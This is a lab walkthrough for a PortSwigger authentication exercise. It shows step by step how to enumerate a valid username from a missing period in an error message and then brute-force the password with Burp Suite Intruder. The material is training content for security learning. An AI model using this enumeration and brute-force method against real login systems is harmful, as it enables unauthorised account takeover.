Username enumeration via subtly different responses
To access the lab visit the following link:
This lab is subtly vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:
To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
Click on the given button to access the lab
On the Lab’s homepage we can see “My account” option. Let’s click on that to attempt login.
Let’s login using any fake credentials to capture the login request using burp. In this case I used “test” as username and password.
As soon as we try to login it says “invalid username or password”. This is a generic error message and it does not disclose whether the username or password is incorrect. So, we can brute force the username and password with the provided lists.
Let’s examine the captured login request in Burp Suite. Right-click on the request and select “Send to Intruder.”
Now, let’s brute force the username using burp intruder.
Ensure the attack type is set to “Sniper”. This is the default attack type and it is suitable for single parameter testing like this.
Go to the Intruder tab and in “Positions” sub-tab. You’ll see the request. We can see the username and password we used to login before.
Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the username parameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
We had the username list provided by portswigger.
Navigate to the “Payloads” tab in Intruder. you can see the Payload tab in the intruder section as shown below.
In the “Payload Sets” section, make sure “Payload set 1” is selected, corresponding to the position you marked.
Under “Payload Options”, select “Simple list”.
Copy the list of usernames provided on the lab page and and click paste in the payload settings.
You can also save the list of usernames in a text file and load a list of usernames from a file by clicking on “Load”.
Now that we are all set with our payloads configured, click on the “Start attack” button.
Burp Suite will start sending requests with each username in our list and display the results in the Intruder tab.
Upon reviewing the results, we observe that all status codes are the same, but the response length varies for each request. This indicates that it’s not possible to identify a unique username based on these results.
Let’s go back to our original login request and copy the error message from its response.
Now, in the results tab of intruder we can see the results filter. Click on this to add a filter based on error message.
The filter tab will appear on the screen. Paste the copied error message into the filter box and check the “Negative search” option. Click on “Apply” to apply the filter.
This helps in narrowing down the search results by excluding all requests that generate the common error message. This way, we can focus on responses that differ, which might indicate a successful attempt or a different type of response.
As soon as we apply this filter, we are left with only one request showing that the payload entered was alerts. When we render the response of this request, we can see that it says "Invalid username or password" without a period at the end.
This response is slightly different from all the other responses, which include a period at the end. This subtle difference suggests that the entered username, alerts, might be valid. The variation in the response indicates that the system processes the request differently when a valid username is used, even though the password is incorrect. Therefore, this discrepancy can be used to infer that alerts is a legitimate username.
We have identified the correct username. Let’s get back to the intruder tab.
Click on “Clear §” to remove all the automatic payload positions. Highlight the value of the password parameter.
Click on “Add §” to mark this value as a payload position. It will be surrounded by § symbols.
We had the password list provided by portswigger.
Copy the list of passwords provided on the lab page and and click paste in the payload settings.
You can also save the list of passwords in a text file and load a list of passwords from a file by clicking on “Load”.
Once your payloads are configured, click on the “Start attack” button.
Burp Suite will start sending requests with each password in our list and display the results in the Intruder tab.
To filter the results based on unique status code we can click on status code.
Upon viewing the status codes we observe that all status codes are the same except one and this could be our desired password.
We have our desired username and password so we can try to login and verify this information on login page.
We have successfully logged in with the username and password we have and the lab is marked as solved.
Congratulations! The walkthrough of fourth authentication lab finishes here.
You can see walkthrough of Fifth lab by clicking the following link:
